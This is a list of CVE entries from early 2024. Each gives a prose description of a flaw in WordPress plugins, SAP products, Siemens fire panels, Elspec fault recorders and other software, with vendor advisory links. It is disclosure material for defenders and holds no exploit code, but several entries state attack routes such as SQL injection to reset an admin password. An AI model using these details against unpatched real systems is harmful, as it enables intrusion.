CVE 2024 22136 Candidate Cross-Site Request Forgery (CSRF) vulnerability in DroitThemes Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder.This issue affects Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder: from n/a through 3.1.5. MISC:https://patchstack.com/database/vulnerability/droit-elementor-addons/wordpress-droit-elementor-addons-plugin-3-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/droit-elementor-addons/wordpress-droit-elementor-addons-plugin-3-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22135 Candidate Unrestricted Upload of File with Dangerous Type vulnerability in WebToffee Order Export & Order Import for WooCommerce.This issue affects Order Export & Order Import for WooCommerce: from n/a through 2.4.3. MISC:https://patchstack.com/database/vulnerability/order-import-export-for-woocommerce/wordpress-order-export-order-import-for-woocommerce-plugin-2-4-3-arbitrary-file-upload-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/order-import-export-for-woocommerce/wordpress-order-export-order-import-for-woocommerce-plugin-2-4-3-arbitrary-file-upload-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22134 Candidate Server-Side Request Forgery (SSRF) vulnerability in Renzo Johnson Contact Form 7 Extension For Mailchimp.This issue affects Contact Form 7 Extension For Mailchimp: from n/a through 0.5.70. MISC:https://patchstack.com/database/vulnerability/contact-form-7-mailchimp-extension/wordpress-contact-form-7-extension-for-mailchimp-plugin-0-5-70-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/contact-form-7-mailchimp-extension/wordpress-contact-form-7-extension-for-mailchimp-plugin-0-5-70-server-side-request-forgery-ssrf-vulnerability?_s_id=cve Assigned (20240105)
CVE 2024 22133 Candidate SAP Fiori Front End Server - version 605, allows altering of approver details on the read-only field when sending leave request information. This could lead to creation of request with incorrect approver causing low impact on Confidentiality and Integrity with no impact on Availability of the application. MISC:https://me.sap.com/notes/3417399 | URL:https://me.sap.com/notes/3417399 | MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 | URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 Assigned (20240105)
CVE 2024 22132 Candidate SAP IDES ECC-systems contain code that permits the execution of arbitrary program code of user's choice.An attacker can therefore control the behaviour of the system by executing malicious code which can potentially escalate privileges with low impact on confidentiality, integrity and availability of the system. MISC:https://me.sap.com/notes/3421659 | URL:https://me.sap.com/notes/3421659 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240105)
CVE 2024 22131 Candidate In SAP ABA (Application Basis) - versions 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75I, an attacker authenticated as a user with a remote execution authorization can use a vulnerable interface. This allows the attacker to use the interface to invoke an application function to perform actions which they would not normally be permitted to perform. Depending on the function executed, the attack can read or modify any user/business data and can make the entire system unavailable. MISC:https://me.sap.com/notes/3420923 | URL:https://me.sap.com/notes/3420923 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240105)
CVE 2024 22130 Candidate Print preview option in SAP CRM WebClient UI - versions S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, S4FND 107, S4FND 108, WEBCUIF 700, WEBCUIF 701, WEBCUIF 730, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting vulnerability. An attacker with low privileges can cause limited impact to confidentiality and integrity of the appliaction data after successful exploitation. MISC:https://me.sap.com/notes/3410875 | URL:https://me.sap.com/notes/3410875 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240105)
CVE 2024 22129 Candidate SAP Companion - version <3.1.38, has a URL with parameter that could be vulnerable to XSS attack. The attacker could send a malicious link to a user that would possibly allow an attacker to retrieve the sensitive information and cause minor impact on the integrity of the web application. MISC:https://me.sap.com/notes/3404025 | URL:https://me.sap.com/notes/3404025 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240105)
CVE 2024 22128 Candidate SAP NWBC for HTML - versions SAP_UI 754, SAP_UI 755, SAP_UI 756, SAP_UI 757, SAP_UI 758, SAP_BASIS 700, SAP_BASIS 701, SAP_BASIS 702, SAP_BASIS 731, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An unauthenticated attacker can inject malicious javascript to cause limited impact to confidentiality and integrity of the application data after successful exploitation. MISC:https://me.sap.com/notes/3396109 | URL:https://me.sap.com/notes/3396109 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240105)
CVE 2024 22127 Candidate SAP NetWeaver Administrator AS Java (Administrator Log Viewer plug-in) - version 7.50, allows an attacker with high privileges to upload potentially dangerous files which leads to command injection vulnerability. This would enable the attacker to run commands which can cause high impact on confidentiality, integrity and availability of the application. MISC:https://me.sap.com/notes/3433192 | URL:https://me.sap.com/notes/3433192 | MISC:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 | URL:https://support.sap.com/en/my-support/knowledge-base/security-notes-news.html?anchorId=section_370125364 Assigned (20240105)
CVE 2024 22126 Candidate The User Admin application of SAP NetWeaver AS for Java - version 7.50, insufficiently validates and improperly encodes the incoming URL parameters before including them into the redirect URL. This results in Cross-Site Scripting (XSS) vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability. MISC:https://me.sap.com/notes/3417627 | URL:https://me.sap.com/notes/3417627 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240105)
CVE 2024 22125 Candidate Under certain conditions the Microsoft Edge browser extension (SAP GUI connector for Microsoft Edge) - version 1.0, allows an attacker to access highly sensitive information which would otherwise be restricted causing high impact on confidentiality. MISC:https://me.sap.com/notes/3386378 | URL:https://me.sap.com/notes/3386378 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240105)
CVE 2024 22124 Candidate Under certain conditions, Internet Communication Manager (ICM) or SAP Web Dispatcher - versions KERNEL 7.22, KERNEL 7.53, KERNEL 7.54, KRNL64UC 7.22, KRNL64UC 7.22EXT, KRNL64UC 7.53, KRNL64NUC 7.22, KRNL64NUC 7.22_EXT, WEBDISP 7.22_EXT, WEBDISP 7.53, WEBDISP 7.54, could allow an attacker to access information which would otherwise be restricted causing high impact on confidentiality. MISC:https://me.sap.com/notes/3392626 | URL:https://me.sap.com/notes/3392626 | MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html | URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html Assigned (20240105)
CVE 2024 22119 Candidate The cause of vulnerability is improper validation of form input field “Name” on Graph page in Items section. MISC:https://support.zabbix.com/browse/ZBX-24070 | URL:https://support.zabbix.com/browse/ZBX-24070 Assigned (20240105)
CVE 2024 22113 Candidate Open redirect vulnerability in Access analysis CGI An-Analyzer released in 2023 December 31 and earlier allows a remote unauthenticated attacker to redirect users to arbitrary websites and conduct phishing attacks via a specially crafted URL. MISC:https://jvn.jp/en/jp/JVN73587943/ | URL:https://jvn.jp/en/jp/JVN73587943/ | MISC:https://www.anglers-net.com/anlog/update/ | URL:https://www.anglers-net.com/anlog/update/ Assigned (20240105)
CVE 2024 2211 Candidate Cross-Site Scripting stored vulnerability in Gophish affecting version 0.12.1. This vulnerability could allow an attacker to store a malicious JavaScript payload in the campaign menu and trigger the payload when the campaign is removed from the menu. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-gophish-admin-panel | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-gophish-admin-panel Assigned (20240306)
CVE 2024 22108 Candidate An issue was discovered in GTB Central Console 15.17.1-30814.NG. The method setTermsHashAction at /opt/webapp/lib/PureApi/CCApi.class.php is vulnerable to an unauthenticated SQL injection via /ccapi.php that an attacker can abuse in order to change the Administrator password to a known value. MISC:https://adepts.of0x.cc/gtbcc-pwned/ | MISC:https://x-c3ll.github.io/cves.html Assigned (20240105)
CVE 2024 22107 Candidate An issue was discovered in GTB Central Console 15.17.1-30814.NG. The method systemSettingsDnsDataAction at /opt/webapp/src/AppBundle/Controller/React/SystemSettingsController.php is vulnerable to command injection via the /old/react/v1/api/system/dns/data endpoint. An authenticated attacker can abuse it to inject an arbitrary command and compromise the platform. MISC:https://adepts.of0x.cc/gtbcc-pwned/ | MISC:https://x-c3ll.github.io/cves.html Assigned (20240105)
CVE 2024 22100 Candidate MicroDicom DICOM Viewer versions 2023.3 (Build 9342) and prior are affected by a heap-based buffer overflow vulnerability, which could allow an attacker to execute arbitrary code on affected installations of DICOM Viewer. A user must open a malicious DCM file in order to exploit the vulnerability. MISC:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-060-01 | URL:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-060-01 Assigned (20240212)
CVE 2024 22099 Candidate NULL Pointer Dereference vulnerability in Linux Linux kernel kernel on Linux, x86, ARM (net, bluetooth modules) allows Overflow Buffers. This vulnerability is associated with program files /net/bluetooth/rfcomm/core.C. This issue affects Linux kernel: v2.6.12-rc2. FEDORA:FEDORA-2024-5db5954a5e | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KSXNF4RLEFLH35BFUQGYXRRVHHUIVBAE/ | FEDORA:FEDORA-2024-f797f1540e | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IVVYSTEVMPYGF6GDSOD44MUXZXAZHOHB/ | MISC:https://bugzilla.openanolis.cn/show_bug.cgi?id=7956 | URL:https://bugzilla.openanolis.cn/show_bug.cgi?id=7956 Assigned (20240115)
CVE 2024 22097 Candidate A double-free vulnerability exists in the BrainVision Header Parsing functionality of The Biosig Project libbiosig Master Branch (ab0ee111) and 2.5.0. A specially crafted .vdhr file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1917 | URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1917 Assigned (20240122)
CVE 2024 22096 Candidate In Rapid Software LLC's Rapid SCADA versions prior to Version 5.8.4, an attacker can append path traversal characters to the filename when using a specific command, allowing them to read arbitrary files from the system. MISC:https://rapidscada.org/contact/ | URL:https://rapidscada.org/contact/ | MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-011-03 Assigned (20240105)
CVE 2024 22093 Candidate When running in appliance mode, an authenticated remote command injection vulnerability exists in an undisclosed iControl REST endpoint on multi-bladed systems. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated MISC:https://my.f5.com/manage/s/article/K000137522 | URL:https://my.f5.com/manage/s/article/K000137522 Assigned (20240201)
CVE 2024 22088 Candidate Lotos WebServer through 0.1.1 (commit 3eb36cc) has a use-after-free in buffer_avail() at buffer.h via a long URI, because realloc is mishandled. MISC:https://github.com/chendotjs/lotos/issues/7 Assigned (20240105)
CVE 2024 22087 Candidate route in main.c in Pico HTTP Server in C through f3b69a6 has an sprintf stack-based buffer overflow via a long URI, leading to remote code execution. MISC:https://github.com/foxweb/pico/issues/31 Assigned (20240105)
CVE 2024 22086 Candidate handle_request in http.c in cherry through 4b877df has an sscanf stack-based buffer overflow via a long URI, leading to remote code execution. MISC:https://github.com/hayyp/cherry/issues/1 Assigned (20240105)
CVE 2024 22085 Candidate An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. The shadow file is world readable. MISC:https://www.elspec-ltd.com/support/security-advisories/ Assigned (20240105)
CVE 2024 22084 Candidate An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. Cleartext passwords and hashes are exposed through log files. MISC:https://www.elspec-ltd.com/support/security-advisories/ Assigned (20240105)
CVE 2024 22083 Candidate An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. A hardcoded backdoor session ID exists that can be used for further access to the device, including reconfiguration tasks. MISC:https://www.elspec-ltd.com/support/security-advisories/ Assigned (20240105)
CVE 2024 22082 Candidate An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. Unauthenticated directory listing can occur: the web interface cay be abused be an attacker get a better understanding of the operating system. MISC:https://www.elspec-ltd.com/support/security-advisories/ Assigned (20240105)
CVE 2024 22081 Candidate An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. Unauthenticated memory corruption can occur in the HTTP header parsing mechanism. MISC:https://www.elspec-ltd.com/support/security-advisories/ Assigned (20240105)
CVE 2024 22080 Candidate An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. Unauthenticated memory corruption can occur during XML body parsing. MISC:https://www.elspec-ltd.com/support/security-advisories/ Assigned (20240105)
CVE 2024 22079 Candidate An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. Directory traversal can occur via the system logs download mechanism. MISC:https://www.elspec-ltd.com/support/security-advisories/ Assigned (20240105)
CVE 2024 22078 Candidate An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. Privilege escalation can occur via world writable files. The network configuration script has weak filesystem permissions. This results in write access for all authenticated users and the possibility to escalate from user privileges to administrative privileges. MISC:https://www.elspec-ltd.com/support/security-advisories/ Assigned (20240105)
CVE 2024 22077 Candidate An issue was discovered in Elspec G5 digital fault recorder versions 1.1.4.15 and before. The SQLite database file has weak permissions. MISC:https://www.elspec-ltd.com/support/security-advisories/ Assigned (20240105)
CVE 2024 22076 Candidate MyQ Print Server before 8.2 patch 43 allows remote authenticated administrators to execute arbitrary code via PHP scripts that are reached through the administrative interface. MISC:https://docs.myq-solution.com/en/print-server/8.2/ | MISC:https://docs.myq-solution.com/en/print-server/8.2/technical-changelog#id-(8.2)ReleaseNotes-8.2(Patch43) | MISC:https://www.access42.nl/nieuws/unmasking-web-vulnerabilities-a-tale-of-default-admin-credentials-and-php-command-execution-cve-2024-22076/ Assigned (20240105)
CVE 2024 22075 Candidate Firefly III (aka firefly-iii) before 6.1.1 allows webhooks HTML Injection. MISC:https://github.com/firefly-iii/firefly-iii/releases/tag/v6.1.1 Assigned (20240105)
CVE 2024 22054 Candidate A malformed discovery packet sent by a malicious actor with preexisting access to the network could interrupt the functionality of device management and discovery. Affected Products: UniFi Access Points UniFi Switches UniFi LTE Backup UniFi Express (Only Mesh Mode, Router mode is not affected) Mitigation: Update UniFi Access Points to Version 6.6.55 or later. Update UniFi Switches to Version 6.6.61 or later. Update UniFi LTE Backup to Version 6.6.57 or later. Update UniFi Express to Version 3.2.5 or later. MISC:https://community.ui.com/releases/Security-Advisory-Bulletin-037-037/9aeeccef-ca4a-4f10-9f66-1eb400b3d027 | URL:https://community.ui.com/releases/Security-Advisory-Bulletin-037-037/9aeeccef-ca4a-4f10-9f66-1eb400b3d027 Assigned (20240105)
CVE 2024 22051 Candidate CommonMarker versions prior to 0.23.4 are at risk of an integer overflow vulnerability. This vulnerability can result in possibly unauthenticated remote attackers to cause heap memory corruption, potentially leading to an information leak or remote code execution, via parsing tables with marker rows that contain more than UINT16_MAX columns. MISC:https://github.com/advisories/GHSA-fmx4-26r3-wxpf | URL:https://github.com/advisories/GHSA-fmx4-26r3-wxpf | MISC:https://github.com/github/cmark-gfm/security/advisories/GHSA-mc3g-88wq-6f4x | URL:https://github.com/github/cmark-gfm/security/advisories/GHSA-mc3g-88wq-6f4x | MISC:https://github.com/gjtorikian/commonmarker/commit/ab4504fd17460627a6ab255bc3c63e8e5fc6aed3 | URL:https://github.com/gjtorikian/commonmarker/commit/ab4504fd17460627a6ab255bc3c63e8e5fc6aed3 | MISC:https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-fmx4-26r3-wxpf | URL:https://github.com/gjtorikian/commonmarker/security/advisories/GHSA-fmx4-26r3-wxpf | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-fmx4-26r3-wxpf | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-fmx4-26r3-wxpf Assigned (20240104)
CVE 2024 22050 Candidate Path traversal in the static file service in Iodine less than 0.7.33 allows an unauthenticated, remote attacker to read files outside the public folder via malicious URLs. MISC:https://github.com/advisories/GHSA-85rf-xh54-whp3 | URL:https://github.com/advisories/GHSA-85rf-xh54-whp3 | MISC:https://github.com/boazsegev/iodine/commit/5558233fb7defda706b4f9c87c17759705949889 | URL:https://github.com/boazsegev/iodine/commit/5558233fb7defda706b4f9c87c17759705949889 | MISC:https://github.com/boazsegev/iodine/security/advisories/GHSA-85rf-xh54-whp3 | URL:https://github.com/boazsegev/iodine/security/advisories/GHSA-85rf-xh54-whp3 | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-85rf-xh54-whp3 | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-85rf-xh54-whp3 Assigned (20240104)
CVE 2024 22049 Candidate httparty before 0.21.0 is vulnerable to an assumed-immutable web parameter vulnerability. A remote and unauthenticated attacker can provide a crafted filename parameter during multipart/form-data uploads which could result in attacker controlled filenames being written. FEDORA:FEDORA-2024-2648dd2e0e | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4LDGAVPR4KB72V4GGQCWODEAI72QZI3V/ | FEDORA:FEDORA-2024-a5aad4eede | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IOWECZPJY6JZIA5FSBJR77KCRDXWDZDA/ | MISC:https://github.com/advisories/GHSA-5pq7-52mg-hr42 | URL:https://github.com/advisories/GHSA-5pq7-52mg-hr42 | MISC:https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43 | URL:https://github.com/jnunemaker/httparty/blob/4416141d37fd71bdba4f37589ec265f55aa446ce/lib/httparty/request/body.rb#L43 | MISC:https://github.com/jnunemaker/httparty/commit/cdb45a678c43e44570b4e73f84b1abeb5ec22b8e | URL:https://github.com/jnunemaker/httparty/commit/cdb45a678c43e44570b4e73f84b1abeb5ec22b8e | MISC:https://github.com/jnunemaker/httparty/security/advisories/GHSA-5pq7-52mg-hr42 | URL:https://github.com/jnunemaker/httparty/security/advisories/GHSA-5pq7-52mg-hr42 | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-5pq7-52mg-hr42 | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-5pq7-52mg-hr42 | MLIST:[debian-lts-announce] 20240123 [SECURITY] [DLA 3716-1] ruby-httparty security update | URL:https://lists.debian.org/debian-lts-announce/2024/01/msg00011.html Assigned (20240104)
CVE 2024 22048 Candidate govuk_tech_docs versions from 2.0.2 to before 3.3.1 are vulnerable to a cross-site scripting vulnerability. Malicious JavaScript may be executed in the user's browser if a malicious search result is displayed on the search page. MISC:https://github.com/advisories/GHSA-x2xw-hw8g-6773 | URL:https://github.com/advisories/GHSA-x2xw-hw8g-6773 | MISC:https://github.com/alphagov/tech-docs-gem/pull/323 | URL:https://github.com/alphagov/tech-docs-gem/pull/323 | MISC:https://github.com/alphagov/tech-docs-gem/releases/tag/v3.3.1 | URL:https://github.com/alphagov/tech-docs-gem/releases/tag/v3.3.1 | MISC:https://github.com/alphagov/tech-docs-gem/security/advisories/GHSA-x2xw-hw8g-6773 | URL:https://github.com/alphagov/tech-docs-gem/security/advisories/GHSA-x2xw-hw8g-6773 | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-x2xw-hw8g-6773 | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-x2xw-hw8g-6773 Assigned (20240104)
CVE 2024 22047 Candidate A race condition exists in Audited 4.0.0 to 5.3.3 that can result in an authenticated user to cause audit log entries to be attributed to another user. MISC:https://github.com/advisories/GHSA-hjp3-5g2q-7jww | URL:https://github.com/advisories/GHSA-hjp3-5g2q-7jww | MISC:https://github.com/collectiveidea/audited/issues/601 | URL:https://github.com/collectiveidea/audited/issues/601 | MISC:https://github.com/collectiveidea/audited/pull/669 | URL:https://github.com/collectiveidea/audited/pull/669 | MISC:https://github.com/collectiveidea/audited/pull/671 | URL:https://github.com/collectiveidea/audited/pull/671 | MISC:https://github.com/collectiveidea/audited/security/advisories/GHSA-hjp3-5g2q-7jww | URL:https://github.com/collectiveidea/audited/security/advisories/GHSA-hjp3-5g2q-7jww | MISC:https://vulncheck.com/advisories/vc-advisory-GHSA-hjp3-5g2q-7jww | URL:https://vulncheck.com/advisories/vc-advisory-GHSA-hjp3-5g2q-7jww Assigned (20240104)
CVE 2024 22045 Candidate A vulnerability has been identified in SINEMA Remote Connect Client (All versions < V3.1 SP1). The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information. This information is also available via the web interface of the product. MISC:https://cert-portal.siemens.com/productcert/html/ssa-653855.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-653855.html Assigned (20240104)
CVE 2024 22044 Candidate A vulnerability has been identified in SENTRON 3KC ATC6 Expansion Module Ethernet (3KC9000-8TL75) (All versions). Affected devices expose an unused, unstable http service at port 80/tcp on the Modbus-TCP Ethernet. This could allow an attacker on the same Modbus network to create a denial of service condition that forces the device to reboot. MISC:https://cert-portal.siemens.com/productcert/html/ssa-918992.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-918992.html Assigned (20240104)
CVE 2024 22043 Candidate A vulnerability has been identified in Parasolid V35.0 (All versions < V35.0.251), Parasolid V35.1 (All versions < V35.1.170). The affected applications contain a null pointer dereference vulnerability while parsing specially crafted XT files. An attacker could leverage this vulnerability to crash the application causing denial of service condition. MISC:https://cert-portal.siemens.com/productcert/html/ssa-797296.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-797296.html Assigned (20240104)
CVE 2024 22042 Candidate A vulnerability has been identified in Unicam FX (All versions). The windows installer agent used in affected product contains incorrect use of privileged APIs that trigger the Windows Console Host (conhost.exe) as a child process with SYSTEM privileges. This could be exploited by an attacker to perform a local privilege escalation attack. MISC:https://cert-portal.siemens.com/productcert/html/ssa-543502.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-543502.html Assigned (20240104)
CVE 2024 22041 Candidate A vulnerability has been identified in Cerberus PRO EN Engineering Tool (All versions), Cerberus PRO EN Fire Panel FC72x (All versions < IP8 SR4), Cerberus PRO EN X200 Cloud Distribution (All versions < V4.3.5618), Cerberus PRO EN X300 Cloud Distribution (All versions < V4.3.5617), Sinteso FS20 EN Engineering Tool (All versions), Sinteso FS20 EN Fire Panel FC20 (All versions < MP8 SR4), Sinteso FS20 EN X200 Cloud Distribution (All versions < V4.3.5618), Sinteso FS20 EN X300 Cloud Distribution (All versions < V4.3.5617), Sinteso Mobile (All versions). The network communication library in affected systems improperly handles memory buffers when parsing X.509 certificates. This could allow an unauthenticated remote attacker to crash the network service. MISC:https://cert-portal.siemens.com/productcert/html/ssa-225840.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-225840.html Assigned (20240104)
CVE 2024 22040 Candidate A vulnerability has been identified in Cerberus PRO EN Engineering Tool (All versions), Cerberus PRO EN Fire Panel FC72x (All versions < IP8 SR4), Cerberus PRO EN X200 Cloud Distribution (All versions < V4.3.5618), Cerberus PRO EN X300 Cloud Distribution (All versions < V4.3.5617), Sinteso FS20 EN Engineering Tool (All versions), Sinteso FS20 EN Fire Panel FC20 (All versions < MP8 SR4), Sinteso FS20 EN X200 Cloud Distribution (All versions < V4.3.5618), Sinteso FS20 EN X300 Cloud Distribution (All versions < V4.3.5617), Sinteso Mobile (All versions). The network communication library in affected systems insufficiently validates HMAC values which might result in a buffer overread. This could allow an unauthenticated remote attacker to crash the network service. MISC:https://cert-portal.siemens.com/productcert/html/ssa-225840.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-225840.html Assigned (20240104)
CVE 2024 2204 Candidate Zemana AntiLogger v2.74.204.664 is vulnerable to a Denial of Service (DoS) vulnerability by triggering the 0x80002004 and 0x80002010 IOCTL codes of the zam64.sys and zamguard64.sys drivers. MISC:https://fluidattacks.com/advisories/hassan/ | URL:https://fluidattacks.com/advisories/hassan/ | MISC:https://zemana.com/us/antilogger.html | URL:https://zemana.com/us/antilogger.html Assigned (20240305)
CVE 2024 22039 Candidate A vulnerability has been identified in Cerberus PRO EN Engineering Tool (All versions < IP8), Cerberus PRO EN Fire Panel FC72x (All versions < IP8), Cerberus PRO EN X200 Cloud Distribution (All versions < V4.0.5016), Cerberus PRO EN X300 Cloud Distribution (All versions < V4.2.5015), Sinteso FS20 EN Engineering Tool (All versions < MP8), Sinteso FS20 EN Fire Panel FC20 (All versions < MP8), Sinteso FS20 EN X200 Cloud Distribution (All versions < V4.0.5016), Sinteso FS20 EN X300 Cloud Distribution (All versions < V4.2.5015), Sinteso Mobile (All versions < V3.0.0). The network communication library in affected systems does not validate the length of certain X.509 certificate attributes which might result in a stack-based buffer overflow. This could allow an unauthenticated remote attacker to execute code on the underlying operating system with root privileges. MISC:https://cert-portal.siemens.com/productcert/html/ssa-225840.html | URL:https://cert-portal.siemens.com/productcert/html/ssa-225840.html Assigned (20240104)
CVE 2024 22028 Candidate Insufficient technical documentation issue exists in thermal camera TMC series all firmware versions. The user of the affected product is not aware of the internally saved data. By accessing the affected product physically, an attacker may retrieve the internal data. MISC:https://3rrr-btob.jp/archives/news/23624 | URL:https://3rrr-btob.jp/archives/news/23624 | MISC:https://jvn.jp/en/jp/JVN96240417/ | URL:https://jvn.jp/en/jp/JVN96240417/ Assigned (20240104)
CVE 2024 22027 Candidate Improper input validation vulnerability in WordPress Quiz Maker Plugin prior to 6.5.0.6 allows a remote authenticated attacker to perform a Denial of Service (DoS) attack against external services. MISC:https://jvn.jp/en/jp/JVN37326856/ | URL:https://jvn.jp/en/jp/JVN37326856/ | MISC:https://wordpress.org/plugins/quiz-maker/ | URL:https://wordpress.org/plugins/quiz-maker/ Assigned (20240104)
CVE 2024 22025 Candidate A vulnerability in Node.js has been identified, allowing for a Denial of Service (DoS) attack through resource exhaustion when using the fetch() function to retrieve content from an untrusted URL. The vulnerability stems from the fact that the fetch() function in Node.js always decodes Brotli, making it possible for an attacker to cause resource exhaustion when fetching content from an untrusted URL. An attacker controlling the URL passed into fetch() can exploit this vulnerability to exhaust memory, potentially leading to process termination, depending on the system configuration. MISC:https://hackerone.com/reports/2284065 | URL:https://hackerone.com/reports/2284065 Assigned (20240104)
CVE 2024 22024 Candidate An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication. MISC:https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US | URL:https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US Assigned (20240104)
CVE 2024 22022 Candidate Vulnerability CVE-2024-22022 allows a Veeam Recovery Orchestrator user that has been assigned a low-privileged role to access the NTLM hash of the service account used by the Veeam Orchestrator Server Service. MISC:https://veeam.com/kb4541 | URL:https://veeam.com/kb4541 Assigned (20240104)
CVE 2024 22021 Candidate Vulnerability CVE-2024-22021 allows a Veeam Recovery Orchestrator user with a low privileged role (Plan Author) to retrieve plans from a Scope other than the one they are assigned to. MISC:https://veeam.com/kb4541 | URL:https://veeam.com/kb4541 Assigned (20240104)
CVE 2024 2202 Candidate The Page Builder by SiteOrigin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the legacy Image widget in all versions up to, and including, 2.29.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/siteorigin-panels/trunk/widgets/widgets.php#L911 | URL:https://plugins.trac.wordpress.org/browser/siteorigin-panels/trunk/widgets/widgets.php#L911 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3053935%40siteorigin-panels&new=3053935%40siteorigin-panels&sfp_email=&sfph_mail=#file31 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3053935%40siteorigin-panels&new=3053935%40siteorigin-panels&sfp_email=&sfph_mail=#file31 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/52116a6f-506f-4eeb-9bcc-19900ef38101?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/52116a6f-506f-4eeb-9bcc-19900ef38101?source=cve Assigned (20240305)
